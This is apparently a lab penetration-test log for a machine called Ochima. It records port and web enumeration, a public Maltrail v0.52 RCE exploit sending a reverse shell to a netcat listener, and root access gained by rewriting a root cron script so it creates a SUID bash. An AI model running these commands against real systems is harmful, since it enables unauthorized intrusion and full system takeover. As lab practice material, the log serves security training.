Ochima
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: Ochima
- IP Address: 192.168.223.32
- Operating System: Linux
ip=192.168.223.32
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 8338
Maltrail v0.52
Google for "Maltrail v0.52 exploit", found
https://github.com/spookier/Maltrail-v0.53-Exploit
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 8338
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
python3 exploit.py 192.168.45.163 8338 http://$ip:8338
nc -lvnp 8338
๐งฌ Privilege Escalation
๐ค Current Access
- User: snort
- Groups: snort
- Shell Type: webshell
๐ Enumeration
Scheduled Tasks:
./pspy64
found
2025/08/04 03:29:01 CMD: UID=0 PID=2653 | cp /bin/bash /home/snort/
2025/08/04 03:29:01 CMD: UID=0 PID=2652 | /bin/sh /var/backups/etc_Backup.sh
2025/08/04 03:29:01 CMD: UID=0 PID=2651 | /bin/sh -c /var/backups/etc_Backup.sh
2025/08/04 03:29:01 CMD: UID=0 PID=2650 | /usr/sbin/CRON -f -P
2025/08/04 03:29:01 CMD: UID=0 PID=2654 | /bin/sh /var/backups/etc_Backup.sh
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Scheduled Task exploit
- Target Binary/Service: etc_Backup.sh
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
echo "cp /bin/bash /home/snort/ && chmod +s /home/snort/bash" | tee etc_Backup.sh
- Smash to root
/home/snort/bash -p